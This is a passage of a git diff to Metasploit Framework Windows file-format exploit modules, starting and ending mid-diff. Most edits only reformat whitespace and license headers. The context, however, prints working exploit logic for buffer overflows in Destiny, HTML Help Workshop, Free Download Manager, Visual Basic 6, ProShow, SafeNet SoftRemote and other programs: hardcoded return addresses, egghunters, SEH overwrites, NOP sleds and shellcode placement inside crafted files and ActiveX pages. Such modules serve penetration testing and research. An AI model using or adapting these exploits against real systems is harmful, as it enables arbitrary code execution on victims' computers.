'Targets' => [ # Tested ok patrickw 20090503 [ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe @@ -51,10 +51,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 03 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'exploit_destiny.m3u']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'exploit_destiny.m3u']), + ], self.class) end 
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 filepls << [target.ret].pack('V')
 filepls << make_nops(10)
 filepls << payload.encoded
- print_status("Creating '#{datastore['FILENAME']}' file ...")
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
 file_create(filepls)
diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb
index 90844880cb..47093de14a 100644
--- a/modules/exploits/windows/fileformat/djvu_imageurl.rb
+++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb
@@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
 require 'msf/core'
@@ -16,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in DjVu ActiveX Component. When sending an + This module exploits a stack overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) - an attacker may be able to execute arbitrary code. This control is not marked safe + an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly. }, 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], + 'Author' => [ 'dean ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-4922' ], [ 'OSVDB', '49592' ], @@ -42,24 +46,24 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'Oct 30 2008', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), - ], self.class) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + ], self.class) end - def exploit + def exploit # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. + + # Create some nops. nops = Rex::Text.to_unescape(make_nops(4)) - + # Set the return. ret = Rex::Text.uri_encode([target.ret].pack('L')) @@ -76,25 +80,25 @@ class Metasploit3 < Msf::Exploit::Remote rand8 = rand_text_alpha(rand(100) + 1) content = %Q| - - - - - | + + + + +| content = Rex::Text.randomize_space(content) 
diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb
index 25380d5065..3c7177ff77 100644
--- a/modules/exploits/windows/fileformat/etrust_pestscan.rb
+++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb
@@ -49,10 +49,10 @@ class Metasploit3 < Msf::Exploit::Remote
 'DisclosureDate' => 'Jun 5 2007',
 'DefaultTarget' => 0))
- register_options(
- [
- OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
- ], self.class)
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
+ ], self.class)
 end
 def exploit
@@ -77,26 +77,25 @@ class Metasploit3 < Msf::Exploit::Remote
 rand7 = rand_text_alpha(rand(100) + 1)
 rand8 = rand_text_alpha(rand(100) + 1)
- content = %Q|
-
-
-
-
- |
+ content = %Q|
+
+
+
+|
 content = Rex::Text.randomize_space(content)
diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb
index 30aac34e27..853c1939a0 100644
--- a/modules/exploits/windows/fileformat/fdm_torrent.rb
+++ b/modules/exploits/windows/fileformat/fdm_torrent.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -16,14 +16,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - + def initialize(info = {}) super(update_info(info, 'Name' => 'Free Download Manager Torrent Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Free Download Manager - 3.0 Build 844. Arbitrary code execution could occur when parsing a - specially crafted torrent file. + 3.0 Build 844. Arbitrary code execution could occur when parsing a + specially crafted torrent file. }, 'License' => MSF_LICENSE, 'Author' => @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + }, 'Payload' => { 'Space' => 1024, @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Free Download Manager 3.0 (Build 844)', { @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote bof = rand_text_alphanumeric(10004) + generate_seh_payload(target.ret) # hit the end of the stack... bof << rand_text(1000) * 50 - + len = rand(10*1024*1024) info_hash = { 'length' => len, @@ -85,19 +85,19 @@ class Metasploit3 < Msf::Exploit::Remote 'piece length' => len + rand(262144 - len), 'pieces' => rand_text(20), } - + ann_hash = { 'info' => info_hash, } - + encoded = bencode_hash(ann_hash) - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(encoded) - + end - + # bencoding functions: # # http://wiki.theory.org/BitTorrentSpecification @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote throw("unsupported bencode data type! " + item.testzt) end end - + def bencode_list(list) ret = "l" list.each do |el| @@ -144,5 +144,5 @@ class Metasploit3 < Msf::Exploit::Remote ret << "e" return ret end - + end 
diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index 70c400edf9..fc0eaf62cf 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,10 +13,10 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::FILEFORMAT include Msf::Exploit::Egghunter - + def initialize(info = {}) super(update_info(info, 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit', @@ -34,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 1024, @@ -42,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -4800, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0 ], @@ -50,24 +54,23 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 06 2006', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), + ], self.class) end def exploit - + # use the egghunter! eh_stub, eh_egg = generate_egghunter - + off = target['Offset'] idxf = "" idxf << make_nops(off - eh_stub.length) idxf << eh_stub idxf << [target.ret].pack('V') - + sploit = "[OPTIONS]\r\n" sploit << "Contents file=" sploit << idxf 
@@ -77,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\r\n" sploit << eh_egg * 2 sploit << payload.encoded - + hhp = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index b483ac84d5..2228666b40 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,10 +13,10 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::FILEFORMAT include Msf::Exploit::Egghunter - + def initialize(info = {}) super(update_info(info, 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit', @@ -35,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 1024, @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -4800, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0 ], 
@@ -51,24 +55,23 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 17 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']), + ], self.class) end def exploit - + # use the egghunter! eh_stub, eh_egg = generate_egghunter - + off = target['Offset'] idxf = "" idxf << make_nops(off - eh_stub.length) idxf << eh_stub idxf << [target.ret].pack('V') - + sploit = "[OPTIONS]\r\n" sploit << "Index file=" sploit << idxf @@ -78,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\r\n" sploit << eh_egg * 2 sploit << payload.encoded - + hhp = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index 8b93eab22e..622083f8dc 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -16,15 +16,15 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - + def initialize(info = {}) super(update_info(info, 'Name' => 'HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HT-MP3Player 1.0. - Arbitrary code execution could occur when parsing a specially crafted + Arbitrary code execution could occur when parsing a specially crafted .HT3 file. - + NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file. }, @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 4108, @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -8500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'HT-MP3Player 1.0', { @@ -76,26 +76,26 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - + # payload first bof = payload.encoded - + # filler bof << rand_text_alphanumeric(payload_space - bof.length) - + # NOTE: the nul smashes a nul, oh no! sehrec = generate_seh_record(target.ret) # jmp -4108 (depends on target addr ending with 0xff) - sehrec[0,4] = "\xe9\xef\xef\xff" + sehrec[0,4] = "\xe9\xef\xef\xff" bof << sehrec - + # crash reading from offset 4096 (put bad addr here) bof[4096,4] = [0xf0f0f0f0].pack('V') - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(bof) - + end - + end diff --git a/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb b/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb index 266c02b754..cff54ff69d 100644 --- a/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb 
@@ -15,14 +15,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'IDEAL Administration 2009 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in IDEAL Administration v9.7. - By creating a specially crafted ipj file, an an attacker may be able - to execute arbitrary code. + By creating a specially crafted ipj file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Dr_IDE', 'dookie', ], @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + }, 'Payload' => { 'Space' => 1000, @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # CALL EBP in ListWmi.dll ], @@ -52,11 +52,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 05 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']), + ], self.class) end def exploit @@ -69,12 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << make_nops(300) sploit << payload.encoded sploit << "\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A" - + ipj = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(ipj) + file_create(ipj) end diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index e4a1a878c9..69f784caed 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb 
@@ -77,30 +77,29 @@ class Metasploit3 < Msf::Exploit::Remote rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| - - - - - - | + content = %Q| + + + + +| content = Rex::Text.randomize_space(content) @@ -110,6 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote end end + =begin Other vulnerable method's: @@ -119,26 +119,26 @@ void CreateSnapFromDefaultProfile(BSTR szDescription); [id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")] void CreateReportOfSysInfoDifferences( - BSTR szOldSnapFile, - BSTR szNewSnapFile, - BSTR szOutFile, - short format, - short append); + BSTR szOldSnapFile, + BSTR szNewSnapFile, + BSTR szOutFile, + short format, + short append); [id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")] void CreateReportOfSnapshotDifferences( - BSTR szOldSnapFile, - BSTR szNewSnapFile, - BSTR szOutFile, - short format); + BSTR szOldSnapFile, + BSTR szNewSnapFile, + BSTR szOutFile, + short format); [id(0x00000012), helpstring("method CreateReportOfAssetDifferences")] void CreateReportOfAssetDifferences( - BSTR szOldSnapFile, - BSTR szNewSnapFile, - BSTR szOutFile, - short format, - BSTR pszAsset, - short append); + BSTR szOldSnapFile, + BSTR szNewSnapFile, + BSTR szOutFile, + short format, + BSTR pszAsset, + short append); =end diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index aa45ad6a03..9e8afe95b0 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb 
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating Excel spreadsheet ...") - out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME'])) + out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME'])) stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE) if (not stg) raise RuntimeError, 'Unable to create output file' diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 3bbff6dbd7..38b616ab46 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,15 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow', 'Description' => %q{ - This module exploits a stack oveflow in Microsoft Visual - Basic 6.0. When a specially crafted vbp file containing a long - reference line, an attacker may be able to execute arbitrary - code. + This module exploits a stack oveflow in Microsoft Visual + Basic 6.0. When a specially crafted vbp file containing a long + reference line, an attacker may be able to execute arbitrary + code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 650, 
@@ -41,19 +45,18 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ], + [ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Sep 4 2007', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']), + ], self.class) end def exploit @@ -98,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(vbp) - + end end diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 9c48dfe8e4..17b74f1102 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' 
@@ -16,12 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit', 'Description' => %q{ - The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker - to execute arbitrary code on a system. By passing a negative integer to the + The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker + to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. This control is not marked safe for scripting, please choose your attack vector carefully. - }, + }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], 'Version' => '$Revision$', @@ -42,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ] + [ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ] ], 'DisclosureDate' => 'Nov 28 2008', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), - ], self.class) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + ], self.class) end def exploit @@ -71,27 +75,27 @@ class Metasploit3 < Msf::Exploit::Remote rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) - + content = %Q| - - - - - - - | + + + + + + +| print_status("Creating HTML file ...") diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index d41b989bf8..01171df824 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 1000, @@ -45,19 +45,19 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - # 0x01a614ea # p/p/r @ all.dnt + # 0x01a614ea # p/p/r @ all.dnt [ 'Windows Universal', { 'Offset' => 4036, 'Ret' => 0x101a4cf9 } ], # p/p/r if.dnt ], 'Privileged' => false, 'DisclosureDate' => 'Aug 20 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.psh']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.psh']), + ], self.class) end def exploit @@ -65,18 +65,18 @@ class Metasploit3 < Msf::Exploit::Remote sploit = make_nops(target['Offset'] - 4 - payload.encoded.length) sploit << payload.encoded sploit << generate_seh_record(target.ret) - + # note, just in case the arguments get modified, we'll jump back into our buffer... sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + target['Offset'].to_s).encode_string # cause exception hitting the end of the stack sploit << rand_text(1000) * 13 - + content = "Photodex(R) ProShow(TM) Show File Version=0\r\n" content << "cells=1\r\n" content << "cell[0].nrOfImages=1\r\n" content << "cell[0].images[0].image=" << sploit << "\r\n" - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(content) 
diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 6cc7556c02..18f33bb66b 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'SafeNet SoftRemote GROUPNAME Buffer Overflow', @@ -34,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 750, 
@@ -45,28 +49,27 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Windows XP SP3 English', { 'Ret' => 0x7e47bcaf } ], + [ 'Windows XP SP3 English', { 'Ret' => 0x7e47bcaf } ], [ 'WinSrv 2000 SP4 English', { 'Ret' => 0x78344dd3 } ], - [ 'WinSrv 2000 SP2 English', { 'Ret' => 0x7843c1a1 } ], - [ 'WinSrv 2003 Enterprise Edition SP1 (v1023) English', { 'Ret' => 0x7741246b } ], + [ 'WinSrv 2000 SP2 English', { 'Ret' => 0x7843c1a1 } ], + [ 'WinSrv 2003 Enterprise Edition SP1 (v1023) English', { 'Ret' => 0x7741246b } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 30 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.spd']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.spd']), + ], self.class) end def exploit # Need to cause the access violation!! sploit = rand_text_alpha_upper(20024) - + sploit[92,4] = [target.ret].pack('V') # Play it safe. sploit[96,100] = "\x90" * 100 @@ -215,10 +218,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(spd) - + end end + =begin First chance exceptions are reported before any exception handling. This exception may be expected and handled. diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index d16093b713..5447060da9 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb 
@@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow', @@ -19,13 +23,13 @@ class Metasploit3 < Msf::Exploit::Remote The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges - of the user. This control is not marked safe for scripting, please choose your + of the user. This control is not marked safe for scripting, please choose your attack vector carefully. }, 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], + 'Author' => [ 'dean ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-6898' ], [ 'OSVDB', '55945'], 
@@ -43,25 +47,25 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3 / IE 7', { 'Ret' => 0x0c0c0c0c } ] + [ 'Windows XP SP3 / IE 7', { 'Ret' => 0x0c0c0c0c } ] ], 'DisclosureDate' => 'Dec 29 2008', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), - ], self.class) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + ], self.class) end - + def exploit - + # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + # Set the return. ret = Rex::Text.uri_encode([target.ret].pack('L')) - + # Randomize the javascript variable names. vname = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(30) + 2) @@ -74,33 +78,31 @@ class Metasploit3 < Msf::Exploit::Remote rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| - - - - - | + content = %Q| + + + +| - # create the file + # create the file print_status("Creating '#{datastore['FILENAME']}' file ...") - + file_create(content) - + end end - diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 433691c535..ffa5ede535 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -180,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we have an array of offets, handle it specially seh_offset = target['Offset'] - if (seh_offset.is_a?(::Array)) + if (seh_offset.is_a?(::Array)) # Multiple offets that can be used simultaneously seh_offset.each { |off| seh = generate_seh_record(target.ret) diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index baf50c30f7..b3dfc4bdc6 100644 --- 